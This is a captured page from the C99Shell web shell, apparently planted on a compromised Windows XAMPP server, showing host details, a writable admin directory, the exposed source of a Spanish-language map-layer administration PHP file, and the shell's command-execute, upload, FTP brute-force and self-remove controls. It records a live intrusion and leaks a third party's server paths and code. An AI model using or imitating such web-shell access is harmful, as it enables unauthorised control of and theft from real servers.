!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\administracion\formas\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mapa_layer_administracion.php (10.02 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    $ia 
= isset($accion);
    if (
$ia == false) {
        
$accion "x";
    }

    include(
'setup_administracion.php');
    include(
'../clases_herramientas/include_acciones.php');
    include(
'pass.php');
    
$id_app 50;
?>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_callJS(jsStr) { //v2.0
  return eval(jsStr)
}
//-->
</script>
<link href="<?php echo $archivo_css?>" rel="stylesheet" type="text/css">
<title><?php echo $nombre_pagina?></title><body bgcolor="<?php echo $color_fondo?>" leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="10">
  <tr>
    <td bgcolor="<?php echo $color_fondo_banner?>"> 
      <table width="100%" border="0" cellspacing="0" cellpadding="0">
        <tr>
          <td width="33%" valign="bottom"><img src="<?php echo $imagen_banner?>" width="<?php echo $ancho_banner?>" height="<?php echo $alto_banner?>"></td>
          <td width="33%" valign="bottom" class="texto">UR: <?php echo $user?></td>
          <td width="33%" align="right" valign="bottom" class="texto"><a href="<?php echo $home_administrador?>">Home 
            Administrador</a> <strong>I</strong> <a href="#" onClick="MM_callJS('history.go(-1);')">Regresar</a></td>
        </tr>
      </table></td>
  </tr>
  <tr> 
    <td bgcolor="<?php echo $color_fondo_cuerpo?>"><table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
        <tr>
          <td><strong>1.</strong> Agregar Capa</td>
        </tr>
        <tr>
          <td><form action="" method="post" enctype="multipart/form-data" name="form1">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right">Nombre:</td>
                  <td width="25%"><input name="mapa_layer_nombre" type="text" id="layer_nombre"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right">Organizaci&oacute;n:</td>
                  <td><select name="fuente_id">
                      <?php $control_f = new filtrar_select_edicion("fuente_id, fuente_nombre""administracion_fuente""fuente_id != 0""""""fuente_id""fuente_id"$id"administracion_fuente""fuente_id"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right">Descripci&oacute;n:</td>
                  <td><textarea name="mapa_layer_descripcion" id="layer_descripcion"></textarea></td>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td align="right">Imagen Bullet:</td>
                  <td><input type="file" name="mapa_layer_bullet"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td colspan="2" align="center"><input name="id_app" type="hidden" id="id_app3" value="<?php echo $id_app?>"> 
                    <input name="accion" type="hidden" id="accion" value="ins_"> 
                    <input type="submit" name="Submit" value="Agregar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <tr>
          <td><strong>2.</strong> Seleccionar Capa</td>
        </tr>
        <tr>
          <td><form name="form2" method="post" action="">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="50%" align="center">
                    <select name="mapa_layer_id">
                    <?php $control = new select_v1(0"mapa_layer_id, mapa_layer_nombre""mapa_layer""mapa_layer_id != 0"20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select>
                    <select name="accion">
                      <option value="-1">Editar</option>
                      <option value="del_">Borrar</option>
                    </select>
                    <input type="submit" name="Submit2" value="Ir...">
                    <input name="id_app" type="hidden" id="id_app2" value="<?php echo $id_app?>">
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>">
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form></td>
        </tr>
        <?php 
        
if ($accion == "-1") { ?>
        <tr>
          <td><strong>3.</strong> Editar Capa</td>
        </tr>
        <tr>
          <td><form name="form3" method="post" action="" enctype="multipart/form-data">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%" align="right">Nombre:</td>
                  <td width="25%"><input name="mapa_layer_nombre" type="text" value="<?php echo $arreglo->RESULTADOS[0][1]; ?>"></td>
                  <td width="25%">&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right">Organizaci&oacute;n:</td>
                  <td><select name="fuente_id" id="select8">
                      <?php $control_f = new filtrar_select_edicion("fuente_id, fuente_nombre""administracion_fuente""fuente_id != 0""""""mapa_layer_id""fuente_id"$arreglo->RESULTADOS[0][0], "mapa_layer""formato_id"); ?>
                    </select></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right">Observaciones:</td>
                  <td><textarea name="mapa_layer_descripcion" id="textarea2"><?php echo $arreglo->RESULTADOS[0][2]; ?></textarea></td>
                  <td>&nbsp;</td>
                </tr>
                <tr>
                  <td>&nbsp;</td>
                  <td align="right">Imagen Bullet:</td>
                  <td><?php echo $arreglo->RESULTADOS[0][4]; ?> <input name="mapa_layer_bullet" type="hidden" value="<?php echo $arreglo->RESULTADOS[0][4]; ?>"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right"><input type="checkbox" name="ver_mapa_layer_bullet" value="1"></td>
                  <td><input type="file" name="mapa_layer_bullet_new"></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td align="right">&nbsp;</td>
                  <td><a href="mapa_puntos_administracion.php?id=<?php echo $arreglo->RESULTADOS[0][0]; ?>&x_y=<?php echo $x_y?>&user=<?php echo $user?>">Agregar 
                    puntos a este Mapa</a></td>
                  <td>&nbsp;</td>
                </tr>
                <tr> 
                  <td>&nbsp;</td>
                  <td colspan="2" align="center"><input name="id_app" type="hidden" id="id_app4" value="<?php echo $id_app?>"> 
                    <input name="mapa_layer_id" type="hidden" id="fuente_id" value="<?php echo $arreglo->RESULTADOS[0][0]; ?>"> 
                    <input name="accion" type="hidden" id="accion3" value="edi_"> 
                    <input type="submit" name="Submit3" value="Editar..."> <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>"> 
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                  </td>
                  <td>&nbsp;</td>
                </tr>
              </table>
            </form>
            <form name="form4" method="post" action="mapa_puntos_administracion.php">
              <table width="100%" border="0" cellspacing="0" cellpadding="6" class="texto">
                <tr> 
                  <td width="25%">&nbsp;</td>
                  <td width="25%"><div align="right">Puntos:</div></td>
                  <td width="25%"><select name="mapa_punto_id" id="select6">
                      <?php 
                  $cuando 
"mapa_layer.mapa_layer_id = mapa_puntos.mapa_layer_id and mapa_layer.mapa_layer_id =" $arreglo->RESULTADOS[0][0];
                  
$control = new select_v1(0"mapa_punto_id, mapa_punto_nombre""mapa_layer, mapa_puntos"$cuando20"(id)-(nombre)""<option value=\"(id)\">(nombre)</option>"""); ?>
                    </select> <select name="accion" id="accion_contacto">
                      <option value="-1">Editar</option>
                      <option value="del_">Borrar</option>
                    </select>
                    <input type="submit" name="Submit4" value="Ir...">
                    <input name="id_app" type="hidden" id="id_app5" value="51">
                    <input name="x_y" type="hidden" id="accion" value="<?php echo $uid->UID?>">
                    <input name="user" type="hidden" id="accion" value="<?php echo $user?>"> 
                    </td>
                  <td width="25%">&nbsp;</td>
                </tr>
              </table>
            </form>
            <p>&nbsp;</p>
            
          </td>
        </tr><?php ?>
      </table></td>
  </tr>
  <tr> 
    <td align="center" bgcolor="<?php echo $color_fondo_pie?>" class="textopequeno"><?php echo $nombre_cliente?><br>
      Todos los Derechos Reservados para NRG<br>
      Bogot&aacute;, Colombia, S.A. <?php echo $ano_vig?><br>
      <a href="../../documentacion/terminos.htm">Terminos de Uso</a> <strong>I</strong> 
      <a href="../../documentacion/terms.htm">Terms of Use</a></td>
  </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--